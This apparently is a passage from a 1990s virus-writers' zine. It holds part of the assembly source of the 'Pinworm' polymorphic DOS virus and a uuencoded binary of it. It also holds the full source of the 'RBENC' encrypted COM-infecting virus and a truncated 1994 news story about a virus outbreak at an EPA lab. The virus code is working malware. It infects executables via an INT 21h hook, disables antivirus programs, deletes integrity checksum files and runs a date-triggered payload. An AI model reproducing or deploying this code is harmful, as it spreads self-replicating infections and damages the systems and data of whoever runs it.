034h ; XOR ... call shit3 ; nested is the set DX xchg sp,dx ; xchg SP and DX jmp xor_op ; 1 db 0EAh ; JMP FAR X:X xor_op: xor word ptr cs: [si],sp ; the real XOR baby.. xchg sp,dx ; restore SP call shit2 dec_si: pop ss ; fuck 'em if they skipped shit2 pop sp int 3 xchg sp,bx ; SP=word of old int 1 vec dec cx mov es: [06],sp ; restore int 1 vector xchg sp,bx ; restore SP jnz dbl_loop ret2_byte db 90h,90h ;ÄÄÄÄ Start of another artificial lifeform ENDIF code_start: IF SECOND_CRYPT pop ax es ; Get port reg bits (ES=PSP) out 21h,al ; restore keyboard ENDIF mov cs: activate[bp],0 ; reset activation toggle mov cs: mem_word[bp],0 ; reset mem. encryption inc si ; SI!=0 mov dx,vsafe_word ; remove VSAFE/VWATCH from memory mov ax,0FA01h ; & check for residency of virus too int 21h or si,si ; if SI=0 then it's us jz no_install mov ah,2ah ; get date int 21h cmp dl,kill_date ; is it time to activate? jnz not_time mov cs: activate[bp],1 not_time: mov ax,es ; PSP segment - popped from DS dec ax ; mcb below PSP m0n mov ds,ax ; DS=MCB seg cmp byte ptr ds: [0],'Z' ; Is this the last MCB in chain? jnz no_install sub word ptr ds: [3],(((vend-start+1023)*2)/1024)*64 ; alloc MCB sub word ptr ds: [12h],(((vend-start+1023)*2)/1024)*64 ; alloc PSP mov es,word ptr ds: [12h] ; get high mem seg push cs pop ds mov si,bp mov cx,(offset vend - offset start)/2+1 xor di,di rep movsw ; copy code to new seg xor ax,ax mov ds,ax ; null ds push ds lds ax,ds: [21h*4] ; get 21h vector mov es: word ptr old21+2,ds ; save S:O mov es: word ptr old21,ax pop ds mov ds: [21h*4+2],es ; new int 21h seg mov ds: [21h*4],offset new21 ; new offset call get_random cmp dl,5 jle no_install sub byte ptr ds: [413h],((offset vend-offset start+1023)*2)/1024 ;-totalmem no_install: xor si,si ; null regs.. xor di,di ; some progs actually care.. xor ax,ax xor bx,bx xor dx,dx pop es ds ; restore ES DS cmp cs: exe_phile[bp],1 jz exe_return lea si,org_bytes[bp] ; com return mov di,0100h ; -restore first 4 bytes movsw movsw mov ax,100h ; jump back to 100h push ax _ret: ret exe_return: mov cx,ds ; calc. real CS add cx,10h add word ptr cs: [exe_jump+2+bp],cx int 3 ; fix prefetch cli mov sp,cs: oldsp[bp] ; restore old SP.. sti db 0eah exe_jump dd 0 oldsp dw 0 exe_phile db 0 ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; Infection routine - called from INT 21h handler. ; DS:DX=fname ; Assumes EXE if first byte is 'M' or 'Z' ; Changes/Restores attribute and time/date ; ; If philename ends in 'AV', 'AN', or 'OT' it's not infected and has it's ; minimum req. memory in the header (0Ah) changed to FFFFh, thus making it ; unusable. ; infect_file: mov di,dx ; move filename ptr into an index reg push ds ; search for end of filename(NULL) pop es xor ax,ax mov cx,128 repnz scasb cmp word ptr [di-3],'EX' ;.eXE? jz is_exec chk_com: cmp word ptr [di-3],'MO' ;.cOM? jnz _ret is_exec: IF KILL_AV mov cs: isav,0 cmp word ptr [di-7],'VA' ;*AV.*? CPAV,MSAV,TBAV,TNTAV jz anti_action cmp word ptr [di-7],'TO' ;*OT.*? F-PROT jz anti_action cmp word ptr [di-7],'NA' ;*AN.*? jnz name_ok cmp word ptr [di-9],'CS' ;*SCAN.*? jnz name_ok anti_action: inc cs: isav ; set mark for anti-virus kill name_ok: ENDIF push ds ; save fname ptr segment mov es,ax ; NULL ES (ax already 0) lds ax,es: [24h*4] ; get INT 24h vector mov old_24_off,ax ; save it mov old_24_seg,ds mov es: [24h*4+2],cs ; install our handler mov es: [24h*4],offset new_24 pop ds ; restore fname ptr segment push es push cs ; push ES for restoring INT24h later pop es ; ES=CS mov ax,4300h ; get phile attribute int 21h mov ax,4301h ; null attribs 4301h push ax cx ds dx ; save AX-call/CX-attrib/DX:DS xor cx,cx ; zero all int 21h mov bx,signal mov ax,3d02h ; open the file int 21h jc close ; if error..quit infection xchg bx,ax ; get handle push cs ; DS=CS pop ds IF KILL_CHKLIST call kill_chklst ; kill CHKLIST.MS & .CPS filez ENDIF mov ax,5700h ; get file time/date int 21h push cx dx ; save 'em for later mov ah,3fh ; Read first bytes of file mov cx,18h ; EXE header or just first bytes of COM lea dx,org_bytes ; buffer used for both int 21h call offset_end ; set ptr to end- DXAX=file_size cmp byte ptr org_bytes,'M' ; EXE? jz do_exe cmp byte ptr org_bytes,'Z' ; EXE? jz do_exe cmp byte ptr org_bytes+3,0 ; CoM infected? jz d_time dec exe_phile push ax ; save file size add ax,100h ; PSP in com mov rel_off,ax ; save it for decryptor mov bp_calc,ax call encrypt_code ; copy and encrypt code lea dx,vend ; start of newly created code mov cx,offset heap+0FFh ; virus length+xtra add cl,size_disp ; add random ^in case cl exceeds FF mov ah,40h int 21h ; append virus to infected file call offset_zero ; position ptr to beginning of file pop ax ; restore COM file size sub ax,3 ; calculate jmp offset mov word ptr new_jmp+1,ax ; save it.. lea dx,new_jmp ; write the new jmp (E9XXXX,0) mov cx,4 ; total of 4 bytes mov ah,40h int 21h d_time: pop dx cx ; pop date/time mov ax,5701h ; restore the mother fuckers int 21h close: mov ah,3eh ; close phile int 21h pop dx ds cx ax ; restore attrib int 21h dont_do: pop es ; ES=0 lds ax,dword ptr old_24_off ; restore shitty DOS error handler mov es: [24h*4],ax mov es: [24h*4+2],ds ret ; return back to INT 21h handler do_exe: cmp dx,max_exe jg d_time mov exe_phile,1 IF KILL_AV cmp isav,1 ; anti-virus software? jnz not_av mov word ptr exe_header[0ah],0FFFFh ; change min. mem to FFFFh jmp write_hdr not_av: ENDIF cmp word ptr exe_header[12h],0 ; checksum 0? jnz d_time mov cx,mem_word ; get random word inc cx ; make sure !0 mov word ptr exe_header[12h],cx ; set checksum to!0 mov cx,word ptr exe_header[10h] ; get old SP mov oldsp,cx ; save it.. mov word ptr exe_header[10h],0 ; write new SP of 0 les cx,dword ptr exe_header[14h] ; Save old entry point mov word ptr exe_jump, cx ; off mov word ptr exe_jump[2], es ; seg push cs ; ES=CS pop es push dx ax ; save file size DX:AX cmp byte ptr exe_header[18h],52h ; PKLITE'd? (v1.13+) jz pklited cmp byte ptr exe_header[18h],40h ; 40+ = new format EXE jge d_time pklited: mov bp, word ptr exe_header+8h ; calc. new entry point mov cl,4 ; *10h shl bp,cl ; ^by shifting one byte sub ax,bp ; get actual file size-header sbb dx,0 mov cx,10h ; divide me baby div cx mov word ptr exe_header+14h,dx ; save new entry point mov word ptr exe_header+16h,ax mov rel_off,dx ; save it for encryptor mov bp_calc,dx call encrypt_code ; encrypt & copy the code mov cx,offset heap+0FFh ; virus size+xtra add cl,size_disp ; add random ^in case cl exceeds FFh lea dx,vend ; new copy in heap mov ah,40h ; write the damn thing int 21h pop ax dx ; AX:DX file size mov cx,(offset heap-offset start)+0FFh ; if xceeds ff below add cl,size_disp adc ax,cx mov cl,9 ; calc new alloc (512) push ax shr ax,cl ror dx,cl stc adc dx,ax pop ax and ah,1 mov word ptr exe_header+4h,dx ; save new mem. alloc info mov word ptr exe_header+2h,ax write_hdr: call offset_zero ; position ptr to beginning mov cx,18h ; write fiXed header lea dx,exe_header mov ah,40h int 21h jmp d_time ; restore shit/return ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; Kill CHKLIST.* filez by nulling attribs, then deleting ; phile. ; kill_chklst: mov di,2 ; counter for loop lea dx,chkl1 ; first fname to kill kill_loop: mov ax,4301h ; reset attribs xor cx,cx int 21h mov ah,41h ; delete phile int 21h lea dx,chkl2 ; second fname to kill dec di jnz kill_loop ret ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; set file ptr offset_zero: ; self explanitory xor al,al jmp set_fp offset_end: mov al,02h set_fp: mov ah,42h xor cx,cx xor dx,dx int 21h ret ;-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ-- ; Morph, copy, & crypt ; ; 0 bytes constant ; 0 operands in constant locations ; ; ms: ; bit 7 ; 6 ; 5 ; 4 - INCREMENT COUNTER OP ; 3 - ; 2 - INCREMENT ENCRYPTOR OP ; 1 - ADD&SUB|XOR ; 0 - WORD|BYTE ; IF<20-SELECTION BETWEEN JNZ AND JNS ; IF<5-DON'T WRITE ENCRYPTION OPS! ; sec: ; IF<=5-use constant NOP instead of random ; encrypt_code: push bx ; save the handle ;ÄÄÄÄ Fill buffer space with garbage bytes lea di,encrypt ; fill buffer /w it mov bp,enc_size+1 call fill_buffer ;ÄÄÄÄ Randomly select between jmp type : JNZ or JNS call get_random mov enc_num,dl ; store ms count for encryption mov mem_word,dx ; mem cryption too mov size_disp,dl ; and size displacment cmp dl,20h jl jmp_2 mov byte ptr jnz_op,75h ; use jnz jmp jmp_set jmp_2: mov byte ptr jnz_op,79h ; jns jmp_set: ;ÄÄÄÄ Change jump address cmp byte ptr jnz_op+1,org_loop+loop_disp_size ; JNX on max offset? jnz inc_jmp_ofs ; if not then inc the ptr mov byte ptr jnz_op+1,org_loop ; jump to pos X in buffer inc_jmp_ofs: inc byte ptr jnz_op+1 ; increment jmp into buffer ;ÄÄÄÄ Change encryption type randomly between XOR and ADD&SUB mov al,04 ; default to encrypting ADD mov enc_type,2Ch ; and decrypting SUB test dl,00000010b ; that bit =1? jz use_add_sub mov al,34h ; encrypting XOR mov enc_type,34h ; decrypting XOR use_add_sub: ;ÄÄÄ Change register used for the counter cmp byte ptr count_op,0BBh ; skip SP/BP/DI/SI jnz get_reg mov byte ptr count_op,0B7h ; AX-1 mov byte ptr dec_op,47h ; AX-1 get_reg: inc byte ptr count_op ; increment to next OP inc byte ptr dec_op ; "" ;ÄÄÄÄ Change position of INC XX mov di,inc_ptr ; get new off for INC XX cmp di,inc_buf_size ; max position? jl good_inc ; if not..then continue mov inc_ptr,0 ; use offset 1 next run xor di,di ; use offset 0 this run good_inc: inc inc_ptr ; increment the ptr for next ;ÄÄÄÄ Toggle between SI and DI cmp byte ptr ptr_set,0BEh ; using SI? jz chg_di ; if so, then switch to DI mov byte ptr inc_buf[di],46h ; write INC SI dec byte ptr ptr_set ; decrement to SI jmp done_chg_ptr chg_di: mov byte ptr inc_buf[di],47h ; write INC DI inc byte ptr ptr_set ; increment to DI inc byte ptr enc_type ; increment decryptor inc ax ; increment encryptor done_chg_ptr: ;ÄÄÄÄ Select word or byte encryption mov w_b,80h ; default to byte cryption test dl,00000001b ; use word? jz use_byte mov w_b,81h ; now using word en/decryptor mov ch,byte ptr inc_buf[di] ; get INC op mov byte ptr word_inc,ch ; write another one use_byte: ;ÄÄÄÄ Increment counter value cmp byte ptr crypt_bytes,0Fh ; byte count quite large? jnz inc_cnt ; if not..increment away mov crypt_bytes,offset vend ; else..reset byte count inc_cnt: inc crypt_bytes ; increment byte count ;ÄÄÄÄ Set DEC XX /JNS|JNZ operands mov di,dec_op_ptr cmp di,dj_buf_size-2 jl good_dec_op mov dec_op_ptr,0 xor di,di good_dec_op: inc dec_op_ptr no_inc_dec_op: add di,offset dj_buf lea si,dec_op movsw movsb inc di ;word align add rel_off,di ;chg offset for decryption push di ;save offset after jmp ;ÄÄÄÄ Set MOV DI,XXXX|MOV SI,XXXX mov di,ptr_op_ptr cmp di,ptr_buf_size-3 jl good_ptr_op mov ptr_op_ptr,0 xor di,di good_ptr_op: test dl,00001000b jz no_inc_ptr_op inc ptr_op_ptr no_inc_ptr_op: add di,offset ptr_buf lea si,ptr_set movsw movsb ;ÄÄÄÄ Set MOV AX|BX|DX|CX,XXXX mov di,count_op_ptr cmp di,cnt_buf_size-3 jl good_count_op mov count_op_ptr,0 xor di,di good_count_op: test dl,00010000b jz no_inc_count_op inc count_op_ptr no_inc_count_op: add di,offset cnt_buf lea si,count_op movsw movsb ;ÄÄÄÄ Set XOR|ADD&SUB WORD|BYTE CS:|DS:[SI|DI],XX|XXXX mov di,enc_op_ptr cmp di,enc_op_bsize-5 jl good_enc_ptr mov enc_op_ptr,0 xor di,di good_enc_ptr: test dl,00000100b jz no_inc_enc_ptr inc enc_op_ptr no_inc_enc_ptr: add di,offset enc_op_buf mov bx,di ; BX points to encrytor pos. lea si,seg_op movsw movsw ;ÄÄÄÄ FiX second cryptor offset IF SECOND_CRYPT mov rel2_off,offset heap ;first gen has mispl. off ENDIF ;ÄÄÄÄ Copy virus code along with decryptor to heap mov cx, (offset heap-offset start)/2+1 xor si,si lea di,vend ; ..to heap for encryption rep movsw ; make another copy of virus IF SECOND_CRYPT ;ÄÄÄÄ Call second encryptor first mov si,offset vend ; offset of enc. start.. add si,offset heap ; ..at end of code mov ret2_byte,0C3h xor bp,bp push ax bx call dbl_crypt pop bx ax mov ret2_byte,90h ENDIF ;ÄÄÄÄ Set ptr to heap for encryption pop si ; pop offset after jmp add si,offset vend ; offset we'z bez encrypting mov di,si ; we might be using DI too ;ÄÄÄÄ Encrypt the mother fucker mov ret_byte,0C3h ; put RET mov byte ptr [bx+2],al ; set encryption type call encryptor ; encrypt the bitch pop bx ; restore phile handle ret ; return ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; Fill buffer with random garbage from table ; DI=off BP=size ; ret: BL=last garbage byte ; ; Decently random..relies on previously encrypted data and MS from clock ; to form pointer to the next operand to use.. ; ; fill_buffer: add bl,dl ; previous NOP+previous NOP off call get_random IF SECOND_CRYPT mov byte ptr sec_enc,cl ; use CL\DL for 2nd encryptor mov byte ptr sec_enc+1,dh ENDIF cmp dh,5 ; use random NOPs or constant NOP? jg use_rand xor dx,dx jmp constant use_rand: add dl,byte ptr vend+200h[di] ; encrypted byte somewhere.. sub dl,bl and dl,00001111b ; extract lower nibble xor dh,dh constant: mov si,dx ; build index ptr mov bl,byte ptr [nops+si] ; get NOP from table mov byte ptr [di],bl inc di ; increment buffer ptr dec bp jnz fill_buffer ; loop ret ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; get time man - and use it as semi-random word ; get_random: mov ah,2ch ; get clock int 21h ret ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; Associated bullshit ; credits db ' þ PIïWérMÿv1.00 - Coded by ûirogen in April 1994' chkl1 db 'CHKLIST.MS',0 ; MSAV shitty checksum chkl2 db 'CHKLIST.CPS',0 ; CPAV shitty checksum pin_dir db 255,'PIïWérM.ûg!',0 ; DIR created root db '..',0 ; for changing to org. dir file1 db 'Iÿhopeÿy',0 ; filez created in dir.. db 'ouÿhaveÿ',0 ; must be 8 chars each+null db 'enjoyedÿ',0 ; (255 not space) db 'yourÿinf',0 db 'estation',0 db 'ÿbyÿtheÿ',0 db 'mighty P',0 db 'inworm p',0 db 'arasiteú',0 db 'úúúúúúúú',0 db 'Fuckÿyou',0 db 'all!ÿÿÿÿ',0 db '-ûirogen',0 ; #13 new_jmp db 0E9h,0,0,0 ; jmp XXXX ,0 (id) inc_ptr dw 0 ; ptr to location of INC enc_op_ptr dw 0 ; actual ENC op ptr ptr_op_ptr dw 0 ; ptr to ptr set pos count_op_ptr dw 0 ; ptr to counter reg pos dec_op_ptr dw 1 ; ptr to decrement counter op pos activate db 0 isav db 0 seg_op db 2Eh ; CS w_b db 80h ; byte=80h word=81h enc_type db 2Ch ; SUB BYTE PTR CS:[SI],XXXX ;XOR/34 enc_num db 0 ptr_set db 0BEh ; MOV SI,XXXX rel_off dw real_start+100h count_op db 0B8h ; CX:B9 AX:b8 crypt_bytes dw offset vend-offset dj_buf dec_op: dec ax ; DEC AX|BX|CX|DX jnz_op: db 75h,org_loop nops: nop ; 1 byte garbage OPs.. must be 16 IF INCLUDE_INT3 int 3 ELSE cld ENDIF into inc bp dec bp cld nop stc cmc clc stc into cli sti inc bp IF INCLUDE_INT3 int 3 ELSE nop ENDIF ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; activation routine ; act_routine: push ax bx cx ds dx bp es cs pop ds mov activate,0 ;we're in work now.. lea dx,pin_dir ;create our subdirectory mov ah,39h int 21h mov ah,3bh ;change to our new subdirectory int 21h lea dx,file1 ;offset of first filename mov bp,msg_filez ;# of filez total make_msg: xor cx,cx ;null attribs mov ah,3ch int 21h ;create phile jc dont_close xchg ax,bx mov ah,3eh ;close phile int 21h dont_close: add dx,9 ;point to next phile dec bp jnz make_msg lea dx,root ; change back to orginal dir mov ah,3bh int 21h cmp r_delay,5 ;5 calls? jl r_no ;if not then skip keyboard ror mov r_delay,-1 xor ax,ax ;es=null mov es,ax ror word ptr es: [416h],1 ;rotate keyboard flags r_no: inc r_delay ;increment calls count mov activate,1 pop es bp dx ds cx bx ax jmp no_act ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; Interrupt 24h - critical error handler ; new_24: ; critical error handler mov al,3 ; prompts suck, return fail iret ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; In-memory encryption function ; **virus encrypted in memory up to this point** ; mem_crypt: mov cx,offset mem_crypt-offset code_start xor di,di ;offset 0 mem_loop: db 2Eh,81h,35h ;CS:XOR WORD PTR [DI], mem_word dw 0 ;XXXX inc di loop mem_loop ret ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; Interrupt 21h ; returns SI=0 and passes control to normal handler if ; VSAFE uninstall command is recieved. ; new21: pushf cmp cs: activate,1 ; time to activate? jnz no_act cmp ah,0Bh jl act_routine no_act: cmp ax,signal ; be it us? jnz not_us ; richtig.. cmp dx,vsafe_word jnz not_us xor si,si ; tis us mov di,4559h ; simulate VSAFE return not_us: cmp ah,4bh ; execute phile? jnz jmp_org go_now: push ax bp bx cx di dx ds es si call mem_crypt ; decrypt in memory call infect_file ; the mother of all calls call mem_crypt ; encrypt in memory pop si es ds dx di cx bx bp ax jmp_org: popf db 0eah ; jump far old21 dd 0 ; O:S exe_header: org_bytes db 0CDh,20h,0,0 ; original COM bytes | exe hdr ;ÄÄÄÄ Start of heap (not written to disk) heap: db 14h dup(0) ; remaining exe header space old_24_off dw 0 ; old int24h vector old_24_seg dw 0 r_delay db 0 size_disp db 0 ; additional size of virus IF XTRA_SPACE db 0DDh dup(0) ; xtra space for random write ; otherwise decryptor will be ; written twice - could make it ; vulnerable ENDIF vend: ; end of virus in memory.. cseg ends end start section 1 of uuencode 5.24 of file pinworm.com by R.E.M. begin 644 pinworm.com MZ0T``,T@@7W]6$5T!X%]_;^L`<[YD$7.^9!%SOF01<[YD$7.^9!%SOF01<[Y MD$7.^9!%SKG(!\[YD$7.^9!%SOF01<[Y1?Q%D/C.^L[,_$W,D)#.D$5%_)#U M1?S.1<[YD$7.^9!%SOF01<[Y1T7.^9!%SOF01<[YD$7.^9!%SODN@35#D$7. M^9!%SOF01<[YD$7.^9!%SOF01<[YD$7.^9!%SOF014?Y276.^9`&7KH`!EZZ M``9>N@`&7KH`!EZZ``9>N@`&7KH`!EZZ`/Z`0HY%CJB1_2XDEZN.0UU:>T(J MI[$3G$%[0E:EL:O<0WL0HX,>@[;(CD60@+Z$%H^00&5M5\7<0H%LC6@J^)XE)CW62& MI"[MKF,DHN#L<.*68J@XW2`:_=J&,-QQ!BJ3)K[G'A:7*&8R9PJJY23"/$ MO&!3B*ABJ&*H8E?I4GRO46C;*&):S"D?53KM%J_CU9_G+]VNAJ2N\JYB*1]1 M(_X6O>/5F^DX]65^R'=9X:N\JC!TV4D?-5E MCNZF\*A$;V0X8J9EMV2F91!BZZ^)VJDA^#.V,)NK94,38U+:JE]E0]H+.VRW MBIQC$&+_KXDS^M:7V[!B$@&OKXF*E&,H7,MEY1;)XI8!KSC<."AAI:X/KYU7BR9B*US=9:@7%^FF>Z\C(6S=92-LVV4A;+Q@;V3; M9:AB;&S?92%LN&`D9+I@IF7Z,BAX>#IRNX MJ-NX8E^3(73?90L;K^N^]*[KOMRHBLUB$02@8*;BK]CV:APB94/P.!$$H&"F MXJ]Q:=.A,GN*>ZA1<7@Z*(:IZ[X%K\'-94!'J-NP8A(!K];HKXF+@)T78*C8 M36<08^M18:^)UNFOB=A89^<71Z&:HD-@&&`<()NKF[!E0VLQ%V*HWQ5B0.2I MBAEC('0\9"%TL64@="AE*)B('J^DKOZN%T-G;F0T9-'BEO^NP]UG;F0U9"6< MKO^NTJRDKO&N3EZ@JA:OTIRDKO&N5BA<,&03%Z*DKOJNU6YD,V3OG*[ZKIRN M^:[IEN>NX5=VU&IO9"UDJ&*;G5=D+60H7#UD%A:CI"T^J"16;#UD0VQNY_1B M[YRN]ZZ@%/JCJAO2HXI;[KFW=9&]D,63V M:E=D,60C7"5D*YV*'J"EKN^N8JA15YVN[Z[C;_6HW#-D#<;O8Y;TKC4C7"%D M*YV)'J"EKNNN8JA15Y1J:MQF5V0A9"FEJ&(6]Z['#.F6Z:[A5T/4:F]D(V2H M8IN=7J"X%JR=KNFNXV]&J-PP9`W&(UPO9"N=MQZ@I:[EKF*H45>4:F;<9E=D M+V0II=AB([T6\Z['#:6NI:@%K]L<89N4%SR@D0W<]FHII,]E;F3S8VM113+[ MBF69\SIN9/-C.#PII/9J(YQN9!-B:^KO8$#'4CEK8'**@6(@;+EC(%2Z8RB< MK1VL47J)HV`]/*)(>^)*;9J4(Y`B_C9D('_O+]VQ:]:$KXFAB)R(,N&-_XO: M+U<4F4R84HA/B"''!LT&B`#10E,+V@W/!\9"P0R((]@0P0Z(4Y%;G"'@*>0K M^S:&+_MBZRKC+N$Q_$SK,OMB5S+AC?^+VB^&F<]#J$R&8N&=P`W8!U<;J`W= MG<`#W@=78LT,P@W1!\R=J!O'%]J=P0S.8LT1W`/<"\<,J)W*&U<6P`=78L4+ MSPK<&X@RJ`O&%<<0Q4+88LD0R1'!%LV8J)A2F%*84IA28NX7RPE7&\<7J`/$ M#HF=5YU78H69P1#'!.)M=FE&L4IGMKO@Q^7SZ-ZYLMZ2N[:YB$IZMUI&OB=:3KXG8I&05 M;ZA18=:4KXD0K?$<7&5#*Z"A+]V/$FNNUI.OB>*6':]GU&QN9-=E5U%H[&A$ M>6R^9E9DUV5N9"=DJ67U.+<[\SI#?1AA9]L<9YN=AN.=(9`E2IIK_H;BENVN M8]UG*)ZC'BE?J9C=:2F8[3O=9YN4%SOMXE0IW7GX-_LS_S"V9/Z*:YU`I%** M%9WV9;0Y!#D4.`0V^\;[S`0XE#D$/`X?-? MW@RP#=$.U6.P8[`%T1>A=;!CL$.00Y!#D$.;0[3FE]:14Q!#L$B0581#D$$5 M199CD#PZ0^_IET.00^_OD$.00Y!#D$.00Y!#D$.00Y!#D$.00Y!#D$.00Y!# MD$.00Y!#D$.00Y!#D$.00Y!#D$.00Y!#D$.00Y!#D$.00Y!#D$.00Y!#D$.0 M0Y!#D$.00Y!#D$.00Y!#D$.00Y!#D$.00Y!#D$.00Y!#D$.00Y!#D$.00Y!# MD$.00Y!#D$.00Y!#D$.00Y!#D$.00Y!#D$.00Y!#D$.00Y!#D$.00Y!#D$.0 <0Y!#D$.00Y!#D$.00Y!#D$.00Y!#D$.00Y!#D)!# ` end sum -r/size 37641/3108 section (from "begin" to "end") sum -r/size 50854/2233 entire input file % RBENC.ASM % ~~~~~~~~~~~~~ Hey all a new virus for all to see. It's my second and it's lame but I think I have figured out encrypting :) ;Virus Name: RBENC (ratboy's encrypted virus) ;Writer: Ratboy ;type: com appender, encrypted, stealth, 3 infection per run, Lame :(, etc.. ;Accredits: All the guys and girls of NuKE. Couldn't have done it without Ya ; Some names worth mentioning, Firecracker, Mike Paris, Unforgiven, ; Analog Dog, etc.. and ofcourse (this pains me to say this, but ; I did learn somethings from him) Aristotle...eventhough you can ; be a real ass, maybe some day all virus writers could UNITE. ;Warning: This virus is for experimental purposes only! ;this is to be used for educational purposes. I assume no responsiblity, ;eventhough this virus contains no distructive coding. code segment org 100h ;starting point assume cs:code,ds:code main: nop ;initial fake beginning nop ;infected files will have a nop ;jump in this area db 'd' ;ID byte startvx proc near call find_offset ;get the offset. To determine ;the Delta Offset. find_offset: pop bp sub bp,offset find_offset ;calulate the delta offset encryptval dw 0 ;inital value for encryptval mov byte ptr [bp + counter],4 ;my way of keeping count:) call encryptdecrypt ;let's unencrypt the virus jmp restore ;now let's go virusing writevirus: call encryptdecrypt ;encrypt the virus mov ah,40h ;write the virus body mov cx,offset endvx - offset startvx ;length of virus lea dx,[bp + startvx] ;where to start int 21h call encryptdecrypt ;now decrypt the body, since we ;can't work with an encrypted ;virus :( ret encryptdecrypt: ;encryption routine mov ax,word ptr [bp + encryptval] ;thanks Dark Angel for lea si,[bp + encryptstart] ;your virus writing mov cx,(endvx - encryptstart + 1 ) /2 ;quide :) again: xor word ptr [si],ax inc si inc si loop again ret encryptstart: restore: mov cx,4 ;now lets restore the host. mov di,100h ;move 4 bytes to the beginning push di lea si,[bp + orig_start] ;where the bytes are rep movsb ;do it 4 times lea dx,[bp + endvx] ;now lets setup a temp DTA in mov ah,1ah ;the heap int 21h mov ah,4eh ;find first find_target: mov cx,3fh ;attribute mask...any file lea dx,[bp + file_type] ;com file ofcourse int 21h jc quit ;no files? Then exit. jmp file_ok ;a file. lets check it out quit: mov dx,80h ;lets restore the original DTA mov ah,1ah ;now remember that di=100h and int 21h ;100h is on the stack. So ret ret ;will take us to 100h. Where ;real program is now. file_ok: mov ax,3d00h ;open read only lea dx,[bp + endvx + 1eh] ;file's name int 21h xchg bx,ax ;mov the file handle to bx mov ax,word ptr [bp + endvx + 1ah] ;now we see if add ax,offset endvx - startvx + 140h ;infecting it will ;make it too big jc next_file ;too big :( next file mov cx,4 ;now some reading. Quiet Please. lea dx,[bp + orig_start] ;put them in this buffer mov ah,3fh int 21h cmp byte ptr [bp + orig_start + 3],'d' ;check for id byte je next_file ;there? next file jmp attack_file ;not there! :) lets go to work! next_file: mov ah,3eh ;close file int 21h mov ah,4fh ;load find next command jmp find_target ;let's do it again. attack_file: mov ax,4301h ;now let's change the File's lea dx,[bp + endvx + 1eh] ;Attributes to nothing xor cx,cx ;cx = 0 int 21h mov ax,word ptr [bp + endvx + 1ah] ;here we setup a new jmp sub ax,3 ;file size - 3 ( jmp )= mov word ptr [bp + new_jump + 1],ax ;displacement mov ah,3eh ;now let's close the file int 21h mov ax,3d02h ;now let's open the file int 21h ;for read/write access xchg bx,ax ;file's handle into bx mov cx,4 ;now we'll copy the new jmp lea dx,[bp + new_jump] ;to the front of the file mov ah,40h ;write command int 21h mov ax,4202h ;now move the file pointer to xor dx,dx ;EOF. Remember a newly opened xor cx,cx ;file. file pointer is at the int 21h ;BOF mov word ptr [bp + encryptval],33h ;now we set up ;encryptval call writevirus ;let's append a Com file mov ax,5701h ;now let's restore the date mov cx,word ptr [bp + endvx + 16h] ;and time of infected mov dx,word ptr [bp + endvx + 18h] ;file ;) int 21h mov ax,4301h ;time to restore the file's lea dx,word ptr [bp + endvx + 1eh] ;attributes mov cx,word ptr [bp + endvx + 15h] int 21h sub [bp + counter],1 ;one infection done -1 cmp [bp + counter],1 ;have done three infections? jne next_file ;nope? Oh goody ;) mov ah,3eh ;close the file. we're done int 21h ;3 infections are enough jmp quit counter db ? ;counter area... file_type db "*.com",0 ;file type. Duh... orig_start db 0cdh,20h,7,8 ;will hold the host's first ;bytes new_jump db 0e9h,?,?,'d' ;new jump work area dedication db 'To My Wife, Love Ratboy' ;to the most lovliest ;woman in the world :) endvx: ;dta area in heap startvx endp code ends end main * Thanks goes out to Digital Justice for all this intresting info * The Herald-Sun (Durham, N.C.) October 29, 1994, Saturday HEADLINE: Environmental testing delayed by computer virus A computer virus has invaded a network at an Environmental Protection Agency lab in Research Triangle Park. The virus, which infected a network that links roughly 250 personal computers, kept employees in the EPA's Health Effects Research Lab from using the machines on Friday, said Ken Laws, an information systems chief for EPA. The virus, known by the name 'Little Red,' has destroyed no data and has infected only a "small percentage" of the computers linked by the network, he added. "At this point, we're still working on a resolution to the problem," Laws said Friday afternoon. "But we have identified a mechanism to detect and eliminate the virus and we are in the process of executing that now." Late Thursday, evidence of the virus prompted EPA officials to shut down computer operations in the Health Effects lab, one of three EPA labs based in Durham's Research Triangle Park. Lab employees were told not to analyze data collected for environmental tests, use their word processors or send electronic messages. Computer technicians plan to check every machine in the network to ensure the virus is eliminated, a 